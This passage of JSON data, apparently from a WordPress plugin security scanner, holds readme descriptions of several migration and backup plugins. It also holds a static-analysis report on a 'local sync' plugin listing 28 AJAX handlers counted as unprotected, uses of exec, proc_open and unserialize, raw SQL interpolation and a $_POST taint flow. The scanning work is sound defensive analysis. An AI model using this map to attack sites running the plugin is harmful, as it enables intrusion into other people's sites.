Wasabi, pCloud, Backblaze, WebDav and more.\u003C\u002Fp>\n\u003Ch3>Minimum Requirements to use WPvivid Backup & Migration plugin\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Character Encoding UTF-8\u003C\u002Fli>\n\u003Cli>PHP version 5.3\u003C\u002Fli>\n\u003Cli>MySQL version 4.1\u003C\u002Fli>\n\u003Cli>WordPress 4.5\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin can optionally connect to third-party storage providers — Google Drive, Dropbox, Microsoft OneDrive, Amazon S3, DigitalOcean Spaces, and FTP\u002FSFTP servers — to store backup files. When remote storage is enabled, backup archives and required authentication tokens are sent to the selected service’s API. Use of these services is subject to their own terms and privacy policies.\u003C\u002Fp>\n","Migrate, staging, backup WordPress, all in one.",900000,16261440,98,1462,"2026-03-25T00:20:00.000Z","4.5",[103,20,125,22,126],"duplicate","staging","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpvivid-backuprestore.0.9.125.zip",75,26,"2026-02-10 17:13:35",{"slug":132,"name":133,"version":134,"author":135,"author_profile":136,"description":137,"short_description":138,"active_installs":139,"downloaded":140,"rating":120,"num_ratings":141,"last_updated":142,"tested_up_to":16,"requires_at_least":143,"requires_php":99,"tags":144,"homepage":148,"download_link":149,"security_score":150,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"migrate-guru","Migrate Guru – Site Migration & Cloning","6.28","migrateguru","https:\u002F\u002Fprofiles.wordpress.org\u002Fmigrateguru\u002F","\u003Cp>Migrate Guru is a powerful WordPress migration plugin designed to seamlessly transfer your WordPress site to a new host or domain. Whether you need to clone, move, or migrate your WordPress website, Migrate Guru ensures a hassle-free process with its one-click migration feature. This plugin supports all-in-one WP migrations, handling large sites up to 200 GB without overloading your server. Compatible with every major web host and equipped with automatic URL rewriting and serialized data handling, it’s the go-to tool for moving WordPress sites to new domains or hosts. Move, clone, or migrate your WordPress site with Migrate Guru—the smart, swift, and secure WordPress migrator and backup plugin.\u003C\u002Fp>\n\u003Ch3>CHECKOUT Migrate Guru in Action\u003C\u002Fh3>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Fht1sBeqRTJY?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch3>TOP FEATURES\u003C\u002Fh3>\n\u003Ch4>One-Click Migration\u003C\u002Fh4>\n\u003Cp>Effortlessly move WordPress sites 80% faster with a single click, migrating 1 GB in under 30 minutes.\u003C\u002Fp>\n\u003Ch4>No Site Overload\u003C\u002Fh4>\n\u003Cp>Migrate Guru uses its own servers, preventing site crashes.\u003C\u002Fp>\n\u003Ch4>Optimized for Large Sites\u003C\u002Fh4>\n\u003Cp>Easily migrate WordPress sites up to 200 GB, overcoming live-site server limits.\u003C\u002Fp>\n\u003Ch4>No Add-Ons Required\u003C\u002Fh4>\n\u003Cp>Seamlessly handle multi-sites and serialized data without extra plugins.\u003C\u002Fp>\n\u003Ch4>No Storage Needed\u003C\u002Fh4>\n\u003Cp>Temporary copies are removed post-migration.\u003C\u002Fp>\n\u003Ch4>Universal Compatibility\u003C\u002Fh4>\n\u003Cp>Compatible with all web hosts, making transfers simple.\u003C\u002Fp>\n\u003Ch4>Automated Search & Replace\u003C\u002Fh4>\n\u003Cp>Accurate search and replace for serialized data.\u003C\u002Fp>\n\u003Ch4>Real-Time Alerts\u003C\u002Fh4>\n\u003Cp>Receive real-time and email alerts on migration status.\u003C\u002Fp>\n\u003Ch3>DISCLAIMER\u003C\u002Fh3>\n\u003Cp>Currently we don’t support:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Local host migrations\u003C\u002Fli>\n\u003Cli>Migration of multi-site network sub-sites to a different domain or migration of a site to multi-site network subdivision.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>HOW TO PERFORM A MIGRATION\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Install Migrate Guru on the site you want to clone.\u003C\u002Fli>\n\u003Cli>Install WordPress on the destination.\u003C\u002Fli>\n\u003Cli>Choose the destination web host that you want to clone your website to, enter details.\u003C\u002Fli>\n\u003Cli>Click ‘Migrate’.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>PROUD MIGRATION PARTNERS of Cloudways, Pantheon and DreamHost\u003C\u002Fh4>\n\u003Ch4>SUPPORTS ALL 5,000+ WEB HOSTS AROUND THE WORLD\u003C\u002Fh4>\n\u003Cp>Pantheon, LiquidWeb, Cloudways, Savvii, DigitalOcean, Hostgator, Godaddy, Bluehost, SiteGround, Kinsta, AWS, Pressable, Webhostingtalk, Inmotion Hosting, Softlayer, Reverbnation, Homestead, Site5, Linode, Fatcow, DreamHost, Rackspace, etc.\u003C\u002Fp>\n\u003Ch3>WordPress Support forum\u003C\u002Fh3>\n\u003Cp>For dedicated support and guidance on Migrate Guru, visit the \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fmigrate-guru\u002F\" rel=\"ugc\">WordPress.org support page\u003C\u002Fa>. Here you can find community discussions, ask questions, and access resources to ensure smooth and efficient WordPress migrations.\u003C\u002Fp>\n","Effortlessly migrate, clone, or transfer your WordPress site to over 5,000 web hosts with Migrate Guru, trusted by Cloudways, Pantheon, and Dreamhost.",200000,2423010,1609,"2025-12-05T07:17:00.000Z","4.0",[20,145,22,146,147],"copy","migration","wordpress-migrate","https:\u002F\u002Fwww.migrateguru.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmigrate-guru.6.28.zip",100,{"slug":152,"name":153,"version":154,"author":155,"author_profile":156,"description":157,"short_description":158,"active_installs":139,"downloaded":159,"rating":160,"num_ratings":161,"last_updated":162,"tested_up_to":16,"requires_at_least":163,"requires_php":164,"tags":165,"homepage":169,"download_link":170,"security_score":171,"vuln_count":172,"unpatched_count":29,"last_vuln_date":173,"fetched_at":31},"wp-migrate-db","WP Migrate Lite – Migration Made Easy","2.7.7","WP Engine","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpengine\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fdeliciousbrains.com\u002Fwp-migrate-db-pro\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=wp-migrate-readme&utm_content=first-description-link\" rel=\"nofollow ugc\">WP Migrate\u003C\u002Fa> is a WordPress migration plugin that makes migrating your database and exporting full sites easy, fast, and stress-free.\u003C\u002Fp>\n\u003Cp>\u003Ciframe loading=\"lazy\" title=\"MDB WP Org Plugin Video\" src=\"https:\u002F\u002Ffast.wistia.net\u002Fembed\u002Fiframe\u002Fvahu041lkd?dnt=1\" allow=\"autoplay; fullscreen\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" msallowfullscreen width=\"750\" height=\"422\">\u003C\u002Fiframe>\u003Cscript src=\"https:\u002F\u002Ffast.wistia.net\u002Fassets\u002Fexternal\u002FE-v1.js\" async>\u003C\u002Fscript>\u003C\u002Fp>\n\u003Ch3>WP Migrate Lite Features\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Database Migrations\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>WP Migrate Lite can help move your WordPress database using an easy-to-follow three-step process.\u003C\u002Fp>\n\u003Col>\n\u003Cli>Find and replace content directly within the user interface.\u003C\u002Fli>\n\u003Cli>Export the SQL.\u003C\u002Fli>\n\u003Cli>Import into your new database using a tool such as phpMyAdmin.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Simple, right? WordPress database migrations shouldn’t have to be overly complicated or cumbersome. With WP Migrate Lite, database transfers become so much easier.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Full-Site Exports\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>WP Migrate Lite can now \u003Ca href=\"https:\u002F\u002Fdeliciousbrains.com\u002Fwp-migrate-db-pro\u002Fdoc\u002Ffull-site-exports\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=wp-migrate-readme&utm_content=full-site-exports\" rel=\"nofollow ugc\">export your entire site\u003C\u002Fa>, including the database, media uploads, themes, plugins, and other files required to create an exact copy of your site in a new environment. In the same friendly interface you know, you can configure your export, choose what you want to include or exclude, and then single-click your way to a downloadable ZIP file of your complete site. A perfect solution for simple migrations and site copying.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Import to Local\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Thanks to our good friends at WP Engine, \u003Ca href=\"https:\u002F\u002Flocalwp.com\u002F?utm_source=migrate-wp-plugin-repo&utm_medium=wpmigrate&utm_campaign=local&utm_content=local-cta\" rel=\"nofollow ugc\">Local\u003C\u002Fa>—the #1 local WordPress development tool—can now \u003Ca href=\"https:\u002F\u002Fdeliciousbrains.com\u002Fwp-migrate-db-pro\u002Fdoc\u002Fimporting-wordpress-local-development-environment\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=wp-migrate-readme&utm_content=import-to-local\" rel=\"nofollow ugc\">import full-site ZIP archives\u003C\u002Fa> that have been exported using WP Migrate. Simply drag and drop the downloaded ZIP file into Local and you’re up and running with a complete copy of your site in minutes.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Find & Replace\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>WP Migrate can find and replace content anywhere in your WordPress database with support for serialized data. This makes it easier to migrate your database without risk of corruption.\u003C\u002Fp>\n\u003Cp>WP Migrate handles serialized data by first unserializing it, identifying individual strings, and replacing any matches with your desired content. Once this process is complete, the data is once again serialized and placed back in the database.\u003C\u002Fp>\n\u003Cp>Example: \u003Ccode>s:5:\"hello\"\u003C\u002Fcode> becomes \u003Ccode>s:11:\"hello world\"\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cp>You can also run a find and replace on the current database even if you have no plans to migrate it.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Database Backups\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>WP Migrate can automatically back up your database before running a find and replace operation or on demand as needed.\u003C\u002Fp>\n\u003Ch3>Testimonials\u003C\u002Fh3>\n\u003Cp>We’ve made an impact since launching the first version of WP Migrate with over 300,000 active installs and hundreds of five-star reviews on WordPress.org. WP Migrate is, in our opinion, the best WordPress migration plugin. Don’t just take our word for it though:\u003C\u002Fp>\n\u003Cp>\u003Cem>[WP Migrate] might be the most amazing thing that has happened in a really long time in the #WordPress world\u003C\u002Fem> – Pippin Williamson – Founder, Sandhills Development.\u003C\u002Fp>\n\u003Cp>\u003Cem>Today, I give continued thanks to @dliciousbrains for migrate db pro and the ease at which it offers migrations from dev-to-and-from-staging\u003C\u002Fem> – Tom Mcfarlin – Senior Backend Engineer, WebDevStudios.\u003C\u002Fp>\n\u003Cp>\u003Cem>How did I ever survive without [WP Migrate] before? #winning\u003C\u002Fem> – Jenny Beaumont – Senior Project Manager, Human Made.\u003C\u002Fp>\n\u003Ch3>Migrate More with WP Migrate Pro\u003C\u002Fh3>\n\u003Cp>If you’re in need of a complete, reliable, and fast push\u002Fpull site migration solution with fine-tuned control over the database, media uploads, themes, plugins, and other wp-content files, then WP Migrate Pro is for you.\u003C\u002Fp>\n\u003Cp>The pro features in WP Migrate fit perfectly into any WordPress developer’s toolbox. Here’s what you get when you upgrade:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Priority email support.\u003C\u002Fli>\n\u003Cli>Push and pull migrations that move the database, themes, plugins, media uploads, and other wp-content files directly between two WordPress sites.\u003C\u002Fli>\n\u003Cli>Advanced multisite features like pushing a subsite to single-site install.\u003C\u002Fli>\n\u003Cli>WP-CLI integration for running migrations from the command line.\u003C\u002Fli>\n\u003Cli>Backup your data before starting the migration.\u003C\u002Fli>\n\u003Cli>Targeted WordPress database migration. Select which tables to migrate and exclude post types from migrations.\u003C\u002Fli>\n\u003Cli>And that’s just the tip of the iceberg. We’re always working on adding value to WP Migrate!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>All of these features and more are yours when you \u003Ca href=\"https:\u002F\u002Fdeliciousbrains.com\u002Fwp-migrate-db-pro\u002Fupgrade\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=wp-migrate-readme&utm_content=upgrade-to-pro\" rel=\"nofollow ugc\">upgrade to WP Migrate Pro\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Ciframe loading=\"lazy\" title=\"WP Migrate DB Pro in Action Video\" src=\"https:\u002F\u002Ffast.wistia.net\u002Fembed\u002Fiframe\u002F5co63n4jqq?dnt=1\" allow=\"autoplay; fullscreen\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" msallowfullscreen width=\"750\" height=\"422\">\u003C\u002Fiframe>\u003Cscript src=\"https:\u002F\u002Ffast.wistia.net\u002Fassets\u002Fexternal\u002FE-v1.js\" async>\u003C\u002Fscript>\u003C\u002Fp>\n","Migrate your database. Export full sites including media, themes, and plugins. Find and replace content with support for serialized data.",7892814,84,313,"2025-12-08T16:39:00.000Z","5.2","5.6",[20,166,167,22,168],"export-site","import-site","push-pull","https:\u002F\u002Fdeliciousbrains.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-migrate-db.2.7.7.zip",99,1,"2025-11-17 22:17:25",{"slug":175,"name":176,"version":177,"author":22,"author_profile":178,"description":179,"short_description":180,"active_installs":181,"downloaded":182,"rating":183,"num_ratings":184,"last_updated":185,"tested_up_to":186,"requires_at_least":100,"requires_php":187,"tags":188,"homepage":190,"download_link":191,"security_score":192,"vuln_count":76,"unpatched_count":29,"last_vuln_date":193,"fetched_at":31},"wp-clone-by-wp-academy","Clone","2.4.8","https:\u002F\u002Fprofiles.wordpress.org\u002Fmigrate\u002F","\u003Cp>\u003Cstrong>Try it out on your free dummy site: Click here => \u003Ca href=\"https:\u002F\u002Ftastewp.com\u002Fplugins\u002Fwp-clone-by-wp-academy\" rel=\"nofollow ugc\">https:\u002F\u002Ftastewp.com\u002Fplugins\u002Fwp-clone-by-wp-academy\u003C\u002Fa>.\u003C\u002Fstrong>\u003Cbr \u002F>\n(this trick works for all plugins in the WP repo – just replace “wordpress” with “tastewp” in the URL)\u003C\u002Fp>\n\u003Cp>WP Clone is a great way to backup, migrate or clone a WordPress site to another domain or hosting server.\u003C\u002Fp>\n\u003Cp>You can also use it to backup, migrate or clone your site to\u002Ffrom local server hosting, to create backup of your site for development or testing purposes, and to install pre-configured backups of WordPress.\u003C\u002Fp>\n\u003Cp>WP Clone is a superior to other backup & migrate plugins for the following reasons:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>It does not require FTP access to backup files you migrate or clone, neither the source or destination site; just install a new WordPress on the destination site, install our backup plugin, and follow the prompts to migrate or clone your site.\u003C\u002Fli>\n\u003Cli>It does not backup or restore the WordPress system files (it just creates user content and database backups); reducing upload time for migration and improving security of your site\u003C\u002Fli>\n\u003Cli>It fetches the site backup via your host’s direct http connection, which saves you from having to upload large backup files, making it easier to migrate.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>What are today’s limitations?\u003C\u002Fh4>\n\u003Cp>Today:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>90% of cases: Backups & migrations work flawlessly (we fixed some key bugs in the most recent version)\u003C\u002Fli>\n\u003Cli>9% of cases: Backups or migrations fail due to your hoster’s configurations (most likely limits in up- and downloads) which is typically the case when you backup or migrate very large sites. However, there’s a workaround: simply do a “Database Only” backup (use “Advanced Settings”), transfer the wp-content directory over with FTP, and then restore new site. Then backup and migration also works.\u003C\u002Fli>\n\u003Cli>1% of cases: Your site\u002Fhosting is abnormal (pardon our French) and backup or migration doesn’t work. However: that’s what we’ll now be working on, so that eventually backups and migrations will work in all cases.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The 1% case means:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Basic rule: DO NOT use it as your only backup solution! Only use it for migrations (so that if something fails, you still have the files on your old site as backup).\u003C\u002Fli>\n\u003Cli>If you want to use it as backup, test it by restoring the backup file on a new site. If that works fine you should be safe.\u003C\u002Fli>\n\u003Cli>In any case, we cannot take any responsibility if backup or migration fails.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note:\u003Cbr \u002F>\n* There is never an issue in damaging the source installation (i.e. on the site where you create the backup). So backup sites at your pleasure. If your backup succeeds then chances are good that the migration (i.e. restore on another site) will also succeed. But don’t take any chances.\u003Cbr \u002F>\n* If backup or migration (restore) fails, just try it again. Often it works on second attempt.\u003C\u002Fp>\n\u003Ch4>Other tips how to backup and migrate\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>NEVER overwrite an installation for which you do not have an alternate backup source (e.g. a cPanel backup). Normally you would restore the backup onto a fresh WP installation on another host or on a subdomain. If the restore fails your destination site might become unusable, so be prepared to enter cPanel and then destroy \u002F recreate the new installation if necessary.\u003C\u002Fli>\n\u003Cli>DO NOT use our backup plugin on WP Engine or any hosting system with proprietary operating system. Instead, use their built-in backup tools.\u003C\u002Fli>\n\u003Cli>Large sites (>2GB) might take as long as an hour to backup and migrate. Sites of 250 MB or less should take no more than a minute or two to backup, depending on your server.\u003C\u002Fli>\n\u003Cli>We recommend you deactivate and delete page caching, security and maybe redirection plugins before you migrate, and re-install them on the new site, if necessary. In general, delete all unnecessary plugins and data from your site before you backup. You can also use the “Exclude directories” option if you have large media files, which you can then copy back to the new site with FTP.\u003C\u002Fli>\n\u003Cli>How to copy from local server to your hosted website: Create a backup of the local site in the usual way, then save the backup file (right-click > Save) to your local disk. Upload this file to the root directory of your destination website and then use this url in the “Restore” dialog of the new site: http:\u002F\u002Fyourdomain.com\u002F.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Help Video\u003C\u002Fh4>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FxN5Ffhyn4Ao?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch4>Credits\u003C\u002Fh4>\n\u003Cp>WP Clone uses functions from the “Safe Search and Replace on Database with Serialized Data” script first written by David Coveney of Interconnect IT Ltd (UK) http:\u002F\u002Fwww.davidcoveney.com or http:\u002F\u002Fwww.interconnectit.com and released under the WTFPL http:\u002F\u002Fsam.zoy.org\u002Fwtfpl\u002F. Partial script with full changelog is placed inside ‘lib\u002Ffiles’ directory.\u003C\u002Fp>\n\u003Cp>This plugin is part of the Inisev product family – \u003Ca href=\"https:\u002F\u002Finisev.com\" rel=\"nofollow ugc\">check out our other products\u003C\u002Fa>.\u003C\u002Fp>\n","100% FREE clone and migration",50000,3458060,82,340,"2025-10-30T08:54:00.000Z","6.8.5","5.5",[103,20,125,22,189],"restore","https:\u002F\u002Fbackupbliss.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-clone-by-wp-academy.2.4.8.zip",93,"2024-11-19 00:00:00",{"attackSurface":195,"codeSignals":325,"taintFlows":513,"riskAssessment":719,"analyzedAt":740},{"hooks":196,"ajaxHandlers":238,"restRoutes":321,"shortcodes":322,"cronEvents":323,"entryPointCount":324,"unprotectedCount":324},[197,203,206,208,211,214,217,220,223,226,230,233,236],{"type":198,"name":199,"callback":200,"file":201,"line":202},"action","plugins_loaded","anonymous","includes\\class-local-sync.php",161,{"type":198,"name":204,"callback":200,"file":201,"line":205},"admin_enqueue_scripts",183,{"type":198,"name":204,"callback":200,"file":201,"line":207},184,{"type":198,"name":209,"callback":200,"file":201,"line":210},"network_admin_menu",187,{"type":198,"name":212,"callback":200,"file":201,"line":213},"admin_menu",189,{"type":198,"name":215,"callback":200,"file":201,"line":216},"setup_theme",221,{"type":198,"name":218,"callback":200,"file":201,"line":219},"the_content",222,{"type":198,"name":221,"callback":200,"file":201,"line":222},"wp_get_attachment_url",223,{"type":198,"name":224,"callback":200,"file":201,"line":225},"admin_print_footer_scripts",224,{"type":227,"name":228,"callback":200,"file":201,"line":229},"filter","wp_calculate_image_srcset",225,{"type":227,"name":231,"callback":200,"file":201,"line":232},"wp_insert_attachment_data",226,{"type":198,"name":234,"callback":200,"file":201,"line":235},"wp_enqueue_scripts",240,{"type":198,"name":234,"callback":200,"file":201,"line":237},241,[239,242,245,248,251,254,257,260,263,265,268,270,273,276,279,282,285,288,291,294,297,300,303,306,309,312,315,318],{"action":240,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":241},"set_as_local_site_losy",192,{"action":243,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":244},"set_as_prod_site_losy",193,{"action":246,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":247},"start_file_list_preparation",194,{"action":249,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":250},"start_db_dump",195,{"action":252,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":253},"sync_from_live_site",196,{"action":255,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":256},"push_to_live_site",197,{"action":258,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":259},"start_zip_download",198,{"action":261,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":262},"start_zip_creation",199,{"action":264,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":11},"zip_extract_dev",{"action":266,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":267},"test_button",201,{"action":266,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":269},202,{"action":271,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":272},"local_sync_get_root_files",203,{"action":274,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":275},"local_sync_get_tables",204,{"action":277,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":278},"local_sync_get_init_root_files",205,{"action":280,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":281},"local_sync_get_files_by_key",206,{"action":283,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":284},"exclude_file_list_local_sync",207,{"action":286,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":287},"include_file_list_local_sync",208,{"action":289,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":290},"exclude_table_list_local_sync",209,{"action":292,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":293},"include_table_list_local_sync",210,{"action":295,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":296},"include_table_structure_only_local_sync",211,{"action":298,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":299},"save_settings_local_sync",212,{"action":301,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":302},"process_get_steps_for_steps_parent_echo",213,{"action":304,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":305},"process_service_login",214,{"action":307,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":308},"process_service_logout",215,{"action":310,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":311},"process_add_site",216,{"action":313,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":314},"process_remove_site",217,{"action":316,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":317},"modified_files_modal_ok",218,{"action":319,"nopriv":52,"callback":200,"hasNonce":52,"hasCapCheck":52,"file":201,"line":320},"modify_all_files_modal_cancel",219,[],[],[],28,{"dangerousFunctions":326,"sqlUsage":374,"outputEscaping":442,"fileOperations":511,"externalRequests":14,"nonceChecks":172,"capabilityChecks":53,"bundledLibraries":512},[327,332,336,339,342,346,349,354,359,363,366,370],{"fn":328,"file":329,"line":330,"context":331},"create_function","admin\\class-local-sync-replace-db-links.php",263,"$walk_function = @create_function('&$str', '$str = \"`$str`\";');",{"fn":333,"file":329,"line":334,"context":335},"unserialize",457,"$unserialized_data = @unserialize($data);",{"fn":333,"file":329,"line":337,"context":338},511,"if (is_string($data) && ($unserialized = @unserialize($data)) !== false) {",{"fn":333,"file":329,"line":340,"context":341},587,"$test = @unserialize($data);",{"fn":333,"file":343,"line":344,"context":345},"admin\\class-local-sync-restore-op.php",926,"if ( is_string( $data ) && ( $unserialized = @unserialize( $data ) ) !== false ) {",{"fn":333,"file":343,"line":347,"context":348},1150,"$tables = @unserialize($raw_result);",{"fn":350,"file":351,"line":352,"context":353},"exec","admin\\class-local-sync-shell-dump.php",301,"$log = @exec($command, $output, $return);",{"fn":355,"file":356,"line":357,"context":358},"popen","admin\\class-local-sync-zip-facade.php",158,"$handle = popen($exec, \"r\");",{"fn":360,"file":356,"line":361,"context":362},"proc_open",191,"$handle = proc_open($exec, $descriptorspec, $pipes, $backup_dir);",{"fn":360,"file":356,"line":364,"context":365},574,"$process = proc_open($exec, $descriptorspec, $pipes, $rdirname);",{"fn":333,"file":367,"line":368,"context":369},"includes\\class-local-sync-options.php",556,"$settings = unserialize($raw_settings);",{"fn":333,"file":371,"line":372,"context":373},"local-sync-bridge\\iwp-pclzip.php",684,"$fieldParams = unserialize($fieldParams);",{"prepared":375,"raw":376,"locations":377},114,30,[378,382,384,385,387,388,392,395,398,400,402,404,407,409,410,411,413,415,417,419,421,423,425,428,430,432,434,436,438,440],{"file":379,"line":380,"context":381},"admin\\class-local-sync-admin.php",95,"$wpdb->query() with variable interpolation",{"file":379,"line":383,"context":381},133,{"file":379,"line":202,"context":381},{"file":379,"line":386,"context":381},190,{"file":379,"line":305,"context":381},{"file":389,"line":390,"context":391},"admin\\class-local-sync-db-op.php",128,"$wpdb->get_results() with variable interpolation",{"file":389,"line":393,"context":394},311,"$wpdb->get_row() with variable interpolation",{"file":389,"line":396,"context":397},336,"$wpdb->get_var() with variable interpolation",{"file":389,"line":399,"context":391},337,{"file":389,"line":401,"context":391},346,{"file":389,"line":403,"context":391},757,{"file":405,"line":406,"context":397},"admin\\class-local-sync-exclude-option.php",229,{"file":405,"line":408,"context":397},233,{"file":329,"line":284,"context":391},{"file":329,"line":293,"context":391},{"file":329,"line":412,"context":391},272,{"file":329,"line":414,"context":397},278,{"file":329,"line":416,"context":391},487,{"file":329,"line":418,"context":391},498,{"file":329,"line":420,"context":381},728,{"file":343,"line":422,"context":381},1239,{"file":371,"line":424,"context":394},680,{"file":426,"line":427,"context":381},"uninstall.php",36,{"file":426,"line":429,"context":381},39,{"file":426,"line":431,"context":381},42,{"file":426,"line":433,"context":381},45,{"file":426,"line":435,"context":381},48,{"file":426,"line":437,"context":381},51,{"file":426,"line":439,"context":381},54,{"file":426,"line":441,"context":381},57,{"escaped":443,"rawEcho":444,"locations":445},43,31,[446,449,452,454,456,458,459,460,462,464,466,468,470,472,474,477,479,481,483,485,487,489,491,494,496,498,500,502,504,506,508],{"file":379,"line":447,"context":448},1344,"raw output",{"file":450,"line":451,"context":448},"admin\\views\\local-sync-settings-display.php",166,{"file":450,"line":453,"context":448},180,{"file":450,"line":455,"context":448},181,{"file":450,"line":457,"context":448},185,{"file":450,"line":275,"context":448},{"file":450,"line":299,"context":448},{"file":450,"line":461,"context":448},231,{"file":450,"line":463,"context":448},234,{"file":450,"line":465,"context":448},251,{"file":450,"line":467,"context":448},284,{"file":450,"line":469,"context":448},286,{"file":450,"line":471,"context":448},308,{"file":450,"line":473,"context":448},309,{"file":475,"line":476,"context":448},"local-sync-bridge\\index.php",690,{"file":475,"line":478,"context":448},691,{"file":371,"line":480,"context":448},2561,{"file":371,"line":482,"context":448},2584,{"file":371,"line":484,"context":448},2607,{"file":371,"line":486,"context":448},4914,{"file":371,"line":488,"context":448},4927,{"file":371,"line":490,"context":448},5350,{"file":492,"line":493,"context":448},"local-sync-bridge\\wp-files\\file.php",1241,{"file":492,"line":495,"context":448},1286,{"file":492,"line":497,"context":448},1294,{"file":492,"line":499,"context":448},1318,{"file":492,"line":501,"context":448},1324,{"file":492,"line":503,"context":448},1330,{"file":492,"line":505,"context":448},1362,{"file":492,"line":507,"context":448},1363,{"file":509,"line":510,"context":448},"local-sync-bridge\\wp-files\\wp-db-custom.php",1308,259,[],[514,537,548,559,570,581,592,603,614,625,636,663,674,699,709],{"entryPoint":515,"graph":516,"unsanitizedCount":172,"severity":69},"modified_files_modal_ok (admin\\class-local-sync-admin.php:471)",{"nodes":517,"edges":534},[518,523,527],{"id":519,"type":520,"label":521,"file":379,"line":522},"n0","source","$_POST",473,{"id":524,"type":525,"label":526,"file":379,"line":522},"n1","transform","→ 